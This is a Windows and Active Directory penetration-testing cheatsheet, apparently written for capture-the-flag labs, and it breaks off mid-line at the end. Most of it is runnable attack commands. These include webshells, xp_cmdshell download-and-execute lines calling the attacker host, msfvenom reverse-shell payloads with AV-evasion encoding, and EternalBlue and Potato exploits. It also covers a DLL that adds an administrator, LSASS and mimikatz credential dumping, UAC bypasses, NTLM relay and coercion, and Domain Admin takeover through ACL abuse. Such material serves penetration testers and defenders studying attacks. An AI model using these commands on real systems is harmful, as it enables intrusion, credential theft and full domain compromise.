Windows & Active Directory Penetration Testing Cheatsheet

# Set your variables — use everywhere export IP=10.10.11.XXX export LHOST=10.10.14.XXX # your tun0 IP export LPORT=4444 export DOMAIN=domain.htb export DC=dc.domain.htb # Add to /etc/hosts echo "$IP $DOMAIN $DC" >> /etc/hosts # Working directory mkdir -p ~/htb/machinename/{nmap,smb,ldap,web,loot,exploits,bloodhound} cd ~/htb/machinename # Install/verify key tools which crackmapexec impacket-secretsdump bloodhound-python evil-winrm

# Fast full port scan first nmap -p- --min-rate=5000 -T4 $IP -oN nmap/all_ports.txt # Service/version/script scan on found ports nmap -p 53,80,88,135,139,389,443,445,464,593,636,3268,3389,5985 -sC -sV -O $IP -oN nmap/targeted.txt # UDP — important for AD (Kerberos, DNS, SNMP) sudo nmap -sU --top-ports 100 $IP -oN nmap/udp.txt # Windows-specific scripts nmap --script smb-security-mode,smb-os-discovery,smb2-security-mode -p 445 $IP nmap --script ldap-rootdse -p 389 $IP nmap --script msrpc-enum -p 135 $IP

# Null session enumeration smbclient -L //$IP -N smbclient //$IP/share_name -N # CrackMapExec (most useful tool for SMB) crackmapexec smb $IP crackmapexec smb $IP -u '' -p '' --shares crackmapexec smb $IP -u 'guest' -p '' --shares crackmapexec smb $IP -u 'guest' -p '' --rid-brute crackmapexec smb $IP -u user -p 'pass' --shares crackmapexec smb $IP -u user -p 'pass' --users crackmapexec smb $IP -u user -p 'pass' --groups crackmapexec smb $IP -u user -p 'pass' --sessions crackmapexec smb $IP -u user -p 'pass' --loggedon-users crackmapexec smb $IP -u user -p 'pass' --pass-pol # Enum4linux-ng enum4linux-ng -A $IP enum4linux-ng -A -u user -p pass $IP # smbmap — list and check permissions smbmap -H $IP smbmap -H $IP -u '' -p '' smbmap -H $IP -u user -p 'pass' smbmap -H $IP -u user -p 'pass' -R # recursive smbmap -H $IP -u user -p 'pass' -R share # recursive on specific share smbmap -H $IP -u user -p 'pass' --download 'share\file.txt' # Connect to share interactively smbclient //$IP/share -U user%pass smbclient //$IP/share -U 'domain\user%pass' # SMBclient commands smb> ls smb> get file.txt smb> put local.txt smb> recurse on smb> prompt off smb> mget * # Download all files from share smbget -R smb://$IP/share -U user%pass # Mount share mount -t cifs //$IP/share /mnt/smb -o username=user,password=pass,domain=domain.htb # Nmap SMB vuln check nmap --script smb-vuln* -p 445 $IP nmap --script smb-enum-shares,smb-enum-users,smb-enum-groups,smb-os-discovery -p 445 $IP

# rpcclient rpcclient -U "" -N $IP rpcclient -U "user%pass" $IP # Inside rpcclient: enumdomusers # list users enumdomgroups # list groups enumalsgroups domain # alias groups querydominfo # domain info queryuser 0x1f4 # query user by RID querygroupmem 0x200 # members of group lookupnames admin # SID lookup lookupsids S-1-5-21-... # reverse SID lookup getdompwinfo # password policy srvinfo # server info netshareenumall # all shares # Impacket — RPC dump impacket-rpcdump $IP impacket-rpcdump $IP -p 593 # HTTP RPC

# Check if RDP is open / get info nmap --script rdp-enum-encryption,rdp-vuln-ms12-020 -p 3389 $IP # Connect xfreerdp /v:$IP /u:user /p:'password' xfreerdp /v:$IP /u:user /p:'password' /d:domain.htb xfreerdp /v:$IP /u:user /p:'password' /d:domain.htb /cert:ignore +clipboard xfreerdp /v:$IP /u:user /pth:NTLM_HASH /d:domain.htb /cert:ignore # pass-the-hash # Remmina GUI remmina # Brute force RDP hydra -l admin -P /usr/share/wordlists/rockyou.txt rdp://$IP -t 4 crowbar -b rdp -s $IP/32 -u user -C /usr/share/wordlists/rockyou.txt

# Check WinRM crackmapexec winrm $IP -u user -p 'pass' crackmapexec winrm $IP -u user -H NTLM_HASH # Evil-WinRM (best WinRM client) evil-winrm -i $IP -u user -p 'password' evil-winrm -i $IP -u user -H NTLM_HASH evil-winrm -i $IP -u user -p 'password' -S # SSL (port 5986) # Inside Evil-WinRM upload /local/file.exe C:\Windows\Temp\file.exe download C:\Users\user\Desktop\file.txt ./file.txt menu # see built-in commands # PowerShell Remoting (from Windows) Enter-PSSession -ComputerName $IP -Credential (Get-Credential) Invoke-Command -ComputerName $IP -Credential (Get-Credential) -ScriptBlock { whoami }

# Zone transfer dig axfr @$IP $DOMAIN host -l $DOMAIN $IP dnsrecon -d $DOMAIN -t axfr # Brute force subdomains gobuster dns -d $DOMAIN -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r $IP -t 30 ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://$DOMAIN -H "Host: FUZZ.$DOMAIN" -fs [size] # DNSRecon dnsrecon -d $DOMAIN -n $IP dnsrecon -d $DOMAIN -t brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt # Nslookup nslookup > server $IP > $DOMAIN > set type=MX > $DOMAIN

# Enumerate nmap --script ms-sql-info,ms-sql-config,ms-sql-empty-password -p 1433 $IP # Connect with Impacket impacket-mssqlclient user:password@$IP impacket-mssqlclient user:password@$IP -windows-auth # Connect with CrackMapExec crackmapexec mssql $IP -u user -p 'pass' crackmapexec mssql $IP -u user -p 'pass' -q "SELECT @@version" # Inside MSSQL CLI (impacket-mssqlclient) SQL> SELECT @@version; SQL> SELECT DB_NAME(); SQL> SELECT name FROM sys.databases; SQL> USE database; SQL> SELECT table_name FROM information_schema.tables; SQL> SELECT name FROM sys.syslogins; # Enable xp_cmdshell SQL> EXEC sp_configure 'show advanced options', 1; RECONFIGURE; SQL> EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; SQL> EXEC xp_cmdshell 'whoami'; SQL> EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://IP/shell.ps1'')"'; # NTLM capture via MSSQL (responder + xp_dirtree) SQL> EXEC xp_dirtree '\\LHOST\share'; # triggers NTLM auth SQL> EXEC xp_fileexist '\\LHOST\share\file'; # Read/write files SQL> SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS x; # Linked servers SQL> SELECT * FROM sys.servers; SQL> EXEC ('SELECT @@version') AT [linkedserver]; SQL> EXEC ('xp_cmdshell ''whoami''') AT [linkedserver];

# Anonymous / guest LDAP ldapsearch -x -H ldap://$IP -b "DC=domain,DC=htb" ldapsearch -x -H ldap://$IP -b "" -s base namingContexts # Authenticated ldapsearch -x -H ldap://$IP -D "user@domain.htb" -w 'password' -b "DC=domain,DC=htb" ldapsearch -x -H ldap://$IP -D "user@domain.htb" -w 'password' -b "DC=domain,DC=htb" "(objectClass=user)" sAMAccountName ldapsearch -x -H ldap://$IP -D "user@domain.htb" -w 'password' -b "DC=domain,DC=htb" "(objectClass=group)" ldapsearch -x -H ldap://$IP -D "user@domain.htb" -w 'password' -b "DC=domain,DC=htb" "(objectClass=computer)" # Find Domain Admins ldapsearch -x -H ldap://$IP -D "user@domain.htb" -w 'password' -b "DC=domain,DC=htb" "(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=htb)" # Enumerate with windapsearch windapsearch -m users --dc $IP windapsearch -m groups --dc $IP windapsearch -m domain-admins --dc $IP windapsearch -m computers --dc $IP windapsearch -m custom --filter "(objectClass=user)" -A sAMAccountName,description --dc $IP # ldapdomaindump (HTML output) ldapdomaindump $IP -u 'domain.htb\user' -p 'password' -o ldap/

# Python BloodHound collector (run from Kali) pip3 install bloodhound bloodhound-python -u user -p 'password' -d domain.htb -ns $IP -c All --zip bloodhound-python -u user -p '' -d domain.htb -ns $IP -c All --zip # guest bloodhound-python -u user --hashes :NTLM_HASH -d domain.htb -ns $IP -c All --zip # SharpHound (run from Windows victim) .\SharpHound.exe -c All --zipfilename loot.zip .\SharpHound.exe -c All,GPOLocalGroup --zipfilename loot.zip powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://IP/SharpHound.ps1'); Invoke-BloodHound -c All -OutputDirectory C:\Temp" # Start BloodHound sudo neo4j start bloodhound & # Login: neo4j:neo4j (change on first run) # Upload zip file, then use queries # Key BloodHound queries: # Find all Domain Admins # Find shortest path to Domain Admin # Find principals with DCSync rights # Find computers where Domain Users can RDP # Find AS-REP Roastable users # Find Kerberoastable users # Find users with constrained delegation # Find computers with unconstrained delegation

# Kerbrute — username enum against Kerberos (no auth needed) kerbrute userenum -d domain.htb --dc $IP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt kerbrute userenum -d domain.htb --dc $IP users.txt -t 50 # CrackMapExec — RID brute (null or guest) crackmapexec smb $IP -u '' -p '' --rid-brute crackmapexec smb $IP -u 'guest' -p '' --rid-brute # Impacket lookupsid impacket-lookupsid guest@$IP -no-pass impacket-lookupsid guest@$IP -no-pass | grep "SidTypeUser" impacket-lookupsid domain.htb/user:pass@$IP # SMB user enum enum4linux-ng -U $IP rpcclient -U "" -N $IP -c "enumdomusers" # Extract usernames from LDAP dump cat ldap/domain_users.json | python3 -c "import sys,json; [print(u['attributes']['sAMAccountName']) for u in json.load(sys.stdin) if u.get('attributes')]" > users.txt

# IIS version detection nmap --script http-iis-webdav-vuln,http-iis-short-name-brute -p 80,443 $IP curl -I http://$IP # look for Server: Microsoft-IIS/X.X # Common IIS paths http://$IP/iisstart.htm http://$IP/_vti_bin/ http://$IP/aspnet_client/ http://$IP/Trace.axd http://$IP/elmah.axd http://$IP/web.config # try to read (403 = exists) http://$IP/.git/ # git repo leak http://$IP/backup.zip # WebDAV check davtest -url http://$IP cadaver http://$IP # WebDAV upload .aspx shell davtest -url http://$IP -uploadfile shell.aspx -uploadloc shell.aspx curl -X PUT http://$IP/shell.aspx -d @shell.aspx # Short name brute force (IIS 8.3 filename leak) java -jar iis_shortname_scanner.jar 2 20 http://$IP/

<!-- simple cmd webshell --> <%@ Page Language="C#" %> <%@ Import Namespace="System.Diagnostics" %> <% string cmd = Request.QueryString["cmd"]; Process p = new Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.Arguments = "/c " + cmd; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.Start(); Response.Write("<pre>" + p.StandardOutput.ReadToEnd() + "</pre>"); %>

<!-- PHP on IIS --> <?php system($_GET['cmd']); ?>

# MSSQL error-based SQLi detection ' ; SELECT @@version -- '; EXEC xp_cmdshell('whoami') -- '; EXEC master.dbo.xp_cmdshell 'ping $LHOST' -- # Enable xp_cmdshell via SQLi '; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE -- '; EXEC xp_cmdshell 'powershell -c IEX(New-Object Net.WebClient).DownloadString(\"http://$LHOST/shell.ps1\")' -- # SQLMap with MSSQL sqlmap -u "http://$IP/page?id=1" --dbms=mssql --os-shell sqlmap -u "http://$IP/page?id=1" --dbms=mssql --technique=E --dbs

# CrackMapExec — SMB crackmapexec smb $IP -u users.txt -p 'Password123' --continue-on-success crackmapexec smb $IP -u users.txt -p passwords.txt --continue-on-success crackmapexec smb $IP -u users.txt -p 'Password123' -d domain.htb # CrackMapExec — WinRM crackmapexec winrm $IP -u users.txt -p 'Password123' --continue-on-success # Kerbrute — password spray (safer, no lockout if careful) kerbrute passwordspray -d domain.htb --dc $IP users.txt 'Password123' # Hydra — WinRM hydra -L users.txt -p 'Password123' $IP http-post-form "/wsman:..." # Rule: Stay under lockout threshold (typically 5 bad attempts) # Check password policy first! crackmapexec smb $IP -u '' -p '' --pass-pol

# Get AS-REP hash (no creds needed if user has "Do not require Kerberos preauthentication") impacket-GetNPUsers domain.htb/ -dc-ip $IP -no-pass -usersfile users.txt impacket-GetNPUsers domain.htb/ -dc-ip $IP -no-pass -request impacket-GetNPUsers domain.htb/user:pass -dc-ip $IP -request # with auth (gets all) # Crack the hash hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt john asrep_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt # Hash format example: # $krb5asrep$23$user@DOMAIN.HTB:...

# Get TGS hashes for service accounts (need valid credentials) impacket-GetUserSPNs domain.htb/user:pass -dc-ip $IP -request impacket-GetUserSPNs domain.htb/user:pass -dc-ip $IP -request -outputfile kerberoast.txt impacket-GetUserSPNs domain.htb/user -hashes :NTLM_HASH -dc-ip $IP -request # From Windows (Rubeus) .\Rubeus.exe kerberoast /outfile:hashes.txt .\Rubeus.exe kerberoast /user:svc_account /outfile:hashes.txt # From Windows (PowerView) Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv hashes.csv # Crack hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt john kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt # Hash format example: # $krb5tgs$23$*user$DOMAIN.HTB$domain.htb/user*$...

# Search for Windows/service exploits searchsploit windows 10 searchsploit IIS 10 searchsploit "exchange server" searchsploit "windows server 2019" # Common high-value Windows CVEs to check: # EternalBlue MS17-010 (SMB — Windows 7/2008) # BlueKeep CVE-2019-0708 (RDP — pre-auth RCE) # PrintNightmare CVE-2021-1675 / CVE-2021-34527 # ProxyLogon CVE-2021-26855 (Exchange) # ProxyShell CVE-2021-34473 (Exchange) # Log4Shell CVE-2021-44228 # Zerologon CVE-2020-1472 (Netlogon) # PetitPotam CVE-2021-36942 (NTLM coerce) # EternalBlue check nmap --script smb-vuln-ms17-010 -p 445 $IP python3 checker.py $IP # from github PoC # AutoBlue / MS17-010 exploit git clone https://github.com/3ndG4me/AutoBlue-MS17-010 cd AutoBlue-MS17-010 python eternal_checker.py $IP ./shell_prep.sh # generate shellcode python eternalblue_exploit7.py $IP shellcode/sc_x64.bin

# Windows x64 EXE msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe -o shell.exe msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe -o meter.exe # Windows x86 EXE msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe -o shell32.exe # DLL msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f dll -o shell.dll # PowerShell msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f ps1 -o shell.ps1 # HTA msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f hta-psh -o shell.hta # ASPX webshell msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f aspx -o shell.aspx # Encoded (basic AV evasion) msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -e x64/xor_dynamic -i 10 -f exe -o encoded.exe # Staged vs stageless # Staged: smaller, connects back for payload (windows/x64/meterpreter/reverse_tcp) # Stageless: self-contained (windows/x64/meterpreter_reverse_tcp)

:: Who am I whoami whoami /priv whoami /groups whoami /all :: System info systeminfo hostname echo %COMPUTERNAME% echo %USERDOMAIN% wmic os get Caption,BuildNumber,ServicePackMajorVersion :: Network ipconfig /all netstat -ano route print arp -a nslookup %USERDOMAIN% :: Users and groups net user net user username net localgroup net localgroup Administrators net group /domain net group "Domain Admins" /domain net accounts /domain :: Processes and services tasklist /v wmic process list full sc query sc query type= all state= all Get-Service (PowerShell) :: Installed software wmic product get Name,Version reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall :: Environment set echo %PATH% echo %APPDATA% echo %TEMP%

# System info $PSVersionTable [System.Environment]::OSVersion Get-WmiObject Win32_OperatingSystem | Select-Object Caption, BuildNumber, ServicePackMajorVersion # Current user [System.Security.Principal.WindowsIdentity]::GetCurrent() [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent() # Network Get-NetIPAddress Get-NetRoute Get-NetTCPConnection -State Listen Get-DnsClientServerAddress # Users Get-LocalUser Get-LocalGroup Get-LocalGroupMember Administrators # AD (if RSAT available) Get-ADUser -Filter * -Properties * Get-ADGroup -Filter * | Select-Object Name Get-ADGroupMember "Domain Admins" Get-ADComputer -Filter * | Select-Object Name Get-ADDomainController (Get-ADDomain).DomainMode # Processes Get-Process | Sort-Object CPU -Descending | Select-Object -First 20 Get-WmiObject Win32_Process | Select-Object Name, ProcessId, ParentProcessId, CommandLine # Services Get-Service | Where-Object { $_.Status -eq "Running" } Get-WmiObject Win32_Service | Select-Object Name, StartName, PathName, StartMode | Where-Object { $_.StartName -ne "LocalSystem" } # Scheduled tasks Get-ScheduledTask | Where-Object { $_.TaskPath -notlike "\Microsoft*" } schtasks /query /fo LIST /v # AppLocker Get-AppLockerPolicy -Effective -Xml # PowerShell history Get-History cat (Get-PSReadlineOption).HistorySavePath # Bypass execution policy (no admin needed) powershell -ep bypass powershell -ExecutionPolicy Bypass -File script.ps1 Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser -Force

:: Credentials in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s :: Unattend / sysprep files type C:\Windows\Panther\Unattend.xml type C:\Windows\Panther\Unattend\Unattend.xml type C:\Windows\System32\sysprep\sysprep.xml type C:\Windows\System32\sysprep\unattend.xml :: IIS config type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config type C:\inetpub\wwwroot\web.config findstr /si password C:\inetpub\*.config :: MSSQL connection strings findstr /si connectionstring C:\inetpub\ :: PowerShell history type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt :: Search for credentials in files findstr /spin "password" *.txt *.xml *.ini *.config 2>nul dir /s /b *pass* *cred* *secret* *config* 2>nul :: .kdbx (KeePass) databases dir /s /b *.kdbx 2>nul :: SSH keys dir /s /b id_rsa id_rsa.pub *.ppk 2>nul :: VNC passwords (encrypted) reg query "HKCU\Software\ORL\WinVNC3\Password" reg query "HKCU\Software\TightVNC\Server"

# WinPEAS (best) .\winPEAS.exe .\winPEAS.exe quiet .\winPEAS.exe systeminfo userinfo .\winPEAS.exe log # save to file # PowerUp (PowerShell) IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/PowerUp.ps1') Invoke-AllChecks | Out-File -Encoding ASCII checks.txt # Seatbelt (comprehensive) .\Seatbelt.exe -group=all .\Seatbelt.exe -group=user .\Seatbelt.exe NTLMSettings OSInfo PoweredOnEvents # Watson (missing patches) .\Watson.exe # Sherlock (older, patches) IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/Sherlock.ps1') Find-AllVulns

:: Check privileges whoami /priv :: KEY PRIVILEGES TO LOOK FOR: :: SeImpersonatePrivilege → Potato attacks :: SeAssignPrimaryToken → Potato attacks :: SeTakeOwnershipPrivilege → Take ownership of files/registry :: SeDebugPrivilege → Dump process memory (LSASS) :: SeBackupPrivilege → Read any file :: SeRestorePrivilege → Write any file :: SeLoadDriverPrivilege → Load kernel drivers (Capcom, etc.) :: SeTcbPrivilege → Act as OS (create tokens) :: SeCreateTokenPrivilege → Create arbitrary tokens

# Potato attacks (SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege) # These work from IIS, SQL Server service accounts, etc. # JuicyPotato (Windows Server 2016 and earlier) .\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c net user hacker Password123! /add && net localgroup administrators hacker /add" -t * .\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c C:\Temp\shell.exe" -t * -c {CLSID} # RoguePotato (newer systems) .\RoguePotato.exe -r $LHOST -e "C:\Temp\shell.exe" -l 9999 # SweetPotato (all-in-one) .\SweetPotato.exe -a "C:\Temp\shell.exe" .\SweetPotato.exe -p C:\Windows\System32\cmd.exe -a "/c net user hacker Password123! /add" # GodPotato (Windows 2012 - 2022, works everywhere) .\GodPotato.exe -cmd "cmd /c whoami" .\GodPotato.exe -cmd "cmd /c C:\Temp\shell.exe" # PrintSpoofer (Windows 10 / Server 2016+) .\PrintSpoofer.exe -i -c cmd .\PrintSpoofer.exe -c "C:\Temp\shell.exe" # SeBackupPrivilege → dump SAM mkdir C:\Temp\loot reg save hklm\sam C:\Temp\loot\SAM reg save hklm\system C:\Temp\loot\SYSTEM reg save hklm\security C:\Temp\loot\SECURITY # Transfer files, then on Kali: impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL # SeDebugPrivilege → LSASS dump .\procdump.exe -ma lsass.exe lsass.dmp # Or: tasklist | findstr lsass # find PID .\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit

:: Find unquoted service paths wmic service get Name,PathName,StartMode | findstr /i "auto" | findstr /v "C:\Windows\\" :: PowerShell Get-WmiObject Win32_Service | Where-Object {$_.PathName -notmatch '"' -and $_.PathName -notmatch "C:\\Windows"} | Select-Object Name, PathName, StartName, StartMode :: PowerUp Get-UnquotedService :: Example exploit: :: PathName: C:\Program Files\Vulnerable Service\service.exe :: Windows tries: C:\Program.exe, C:\Program Files\Vulnerable.exe, C:\Program Files\Vulnerable Service\service.exe :: Place malicious: C:\Program Files\Vulnerable.exe msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe -o "Vulnerable.exe" copy Vulnerable.exe "C:\Program Files\Vulnerable.exe" sc stop VulnerableService sc start VulnerableService :: Or wait for reboot

:: Check service permissions accesschk.exe /accepteula -uwcqv "Authenticated Users" * accesschk.exe /accepteula -uwcqv user * accesschk.exe /accepteula -ucqv VulnerableService :: PowerShell Get-Acl HKLM:\System\CurrentControlSet\Services\VulnerableService | Format-List :: If you have WRITE permission to a service binary: msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe -o malicious.exe copy malicious.exe "C:\Path\To\Service\binary.exe" /y sc stop ServiceName sc start ServiceName :: If you can change service binary path: sc config ServiceName binpath= "C:\Temp\shell.exe" sc stop ServiceName && sc start ServiceName :: Check for weak folder permissions (DLL hijacking prep) accesschk.exe /accepteula -uwdq "C:\Program Files\" icacls "C:\Program Files\Service\"

:: Check reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated :: Both must be 0x1 for exploit :: If enabled, create malicious MSI msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f msi -o shell.msi msiexec /quiet /qn /i C:\Temp\shell.msi :: PowerUp Write-UserAddMSI # creates adduser.msi

:: Find missing DLLs in process monitor or with: .\Process Monitor\Procmon.exe # filter on DLL not found :: Common hijackable locations: :: - Services running from user-writable directories :: - Applications loading DLLs from PATH :: - DLLs not found and searched in user-writable dirs :: Create malicious DLL msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f dll -o hijack.dll copy hijack.dll "C:\Writable\Path\missing.dll" :: C DLL template:

#include <windows.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { if (fdwReason == DLL_PROCESS_ATTACH) { system("cmd /c net user hacker Password123! /add && net localgroup administrators hacker /add"); } return TRUE; } // Compile: x86_64-w64-mingw32-gcc -shared -o hijack.dll hijack.c

:: List scheduled tasks schtasks /query /fo LIST /v | findstr /i "task\|run\|user" Get-ScheduledTask | Where-Object {$_.TaskPath -notlike "\Microsoft*"} | Select-Object TaskName, TaskPath :: Check permissions on task script/binary icacls "C:\Scripts\task_script.ps1" icacls "C:\Program Files\task_binary.exe" :: If writable, replace with malicious version copy shell.exe "C:\Scripts\task_script.exe" /y :: Wait for task to run, or if modifiable: schtasks /change /tn "TaskName" /ru SYSTEM /tr "C:\Temp\shell.exe"

:: Windows Credential Manager cmdkey /list runas /savecred /user:admin "cmd /c C:\Temp\shell.exe" :: Mimikatz (if admin → SYSTEM creds) .\mimikatz.exe privilege::debug sekurlsa::logonpasswords sekurlsa::wdigest # cleartext if wdigest enabled lsadump::sam # SAM hashes lsadump::cache # cached creds vault::cred /patch # vault creds :: Enable WDigest (store creds in cleartext) reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f :: Wait for user to log back in :: DPAPI — decrypt browser saved passwords .\mimikatz.exe dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

:: Check autoruns reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce :: Check if autorun binary is writable icacls "C:\Path\To\Autorun\binary.exe" :: If writable, replace with shell copy shell.exe "C:\Path\To\Autorun\binary.exe" /y :: Wait for admin to log in / reboot

# Check UAC level (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin # 0 = No prompt (disabled), 5 = Prompt for admin (default) # Method 1 — fodhelper bypass (Windows 10) New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Temp\shell.exe" -Force Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden # Method 2 — eventvwr bypass New-Item -Path "HKCU:\Software\Classes\mscfile\shell\open\command" -Force Set-ItemProperty -Path "HKCU:\Software\Classes\mscfile\shell\open\command" -Name "(default)" -Value "C:\Temp\shell.exe" Start-Process "eventvwr.exe" # Method 3 — UACME (collection of 70+ bypasses) .\Akagi64.exe 23 C:\Temp\shell.exe # Method 4 — RunAs with known admin creds Start-Process cmd.exe -Credential (New-Object System.Management.Automation.PSCredential('admin', (ConvertTo-SecureString 'password' -AsPlainText -Force))) -ArgumentList '/c C:\Temp\shell.exe'

# Step 1: Disable SMB signing check nmap --script smb2-security-mode -p 445 $IP/24 # Step 2: Setup Responder (to capture / poison) # Edit Responder.conf: SMB = Off, HTTP = Off (for relay, not capture) responder -I tun0 -rdwv # Step 3: Setup ntlmrelayx # Relay to specific target impacket-ntlmrelayx -tf targets.txt -smb2support impacket-ntlmrelayx -tf targets.txt -smb2support -i # interactive shell # Relay to get SAM dump impacket-ntlmrelayx -t $IP -smb2support # Relay to execute command impacket-ntlmrelayx -t $IP -smb2support -c "whoami > C:\Temp\out.txt" # Relay to LDAP (for AD attacks) impacket-ntlmrelayx -t ldap://$DC --escalate-user user_to_escalate # Step 4: Trigger NTLM auth (various methods) # - Access \\$LHOST from victim (social engineering, XSS) # - PrinterBug / SpoolSample impacket-dfscoerce $LHOST $TARGET python3 SpoolSample.py $TARGET $LHOST # PetitPotam (force DC to auth) python3 PetitPotam.py $LHOST $DC python3 PetitPotam.py -u user -p pass -d domain.htb $LHOST $DC

# Find unconstrained delegation computers impacket-findDelegation domain.htb/user:pass -dc-ip $IP Get-ADComputer -Filter {TrustedForDelegation -eq $true} | Select-Object Name # Unconstrained delegation exploitation # When target machine has unconstrained delegation: # 1. Get code exec on delegating computer # 2. Wait for privileged user to connect, or force DC to auth (PrinterBug) # 3. Dump tickets with Mimikatz/Rubeus .\Rubeus.exe monitor /interval:5 /nowrap python3 SpoolSample.py $DC $COMPROMISED_COMPUTER # force DC TGT .\Rubeus.exe ptt /ticket:BASE64_TICKET # Constrained delegation Get-ADUser -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo Get-ADComputer -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo # Exploit constrained delegation (S4U2Proxy) .\Rubeus.exe s4u /user:svc_account /password:pass /impersonateuser:administrator /msdsspn:"http/target.domain.htb" /nowrap .\Rubeus.exe s4u /user:svc_account /rc4:NTLM_HASH /impersonateuser:administrator /msdsspn:"cifs/target.domain.htb" /ptt # Resource-Based Constrained Delegation (RBCD) # If you can write msDS-AllowedToActOnBehalfOfOtherIdentity on a computer: # 1. Create a machine account (or use existing with SPN) impacket-addcomputer domain.htb/user:pass -computer-name 'ATTACKER$' -computer-pass 'Pass123!' # 2. Configure RBCD python3 rbcd.py -f ATTACKER -t TARGET -dc-ip $DC domain.htb/user:pass # 3. Get ticket impacket-getST -spn 'cifs/target.domain.htb' -impersonate administrator -dc-ip $DC domain.htb/'ATTACKER$':'Pass123!' # 4. Use ticket export KRB5CCNAME=administrator.ccache impacket-psexec -k -no-pass domain.htb/administrator@target.domain.htb

# Find interesting ACLs with BloodHound (primary method) # Look for: GenericAll, GenericWrite, WriteOwner, WriteDACL, ForceChangePassword, AddMember # Or with PowerView IEX(New-Object Net.WebClient).DownloadString('http://$LHOST/PowerView.ps1') Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -match "compromised_user"} # GenericAll on User — force password reset Set-DomainUserPassword -Identity target_user -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force) -Verbose net user target_user NewPass123! /domain # GenericAll on Group — add member Add-DomainGroupMember -Identity "Domain Admins" -Members compromised_user net group "Domain Admins" compromised_user /add /domain # GenericWrite on User — targeted Kerberoast or logon script Set-DomainObject -Identity target_user -Set @{'serviceprincipalname'='fake/spn'} # add SPN → Kerberoast Set-DomainObject -Identity target_user -Set @{'scriptpath'='\\$LHOST\share\malicious.bat'} # WriteOwner — take ownership, then full control Set-DomainObjectOwner -Identity target -OwnerIdentity compromised_user Add-DomainObjectAcl -TargetIdentity target -PrincipalIdentity compromised_user -Rights All # WriteDACL — add DCSync 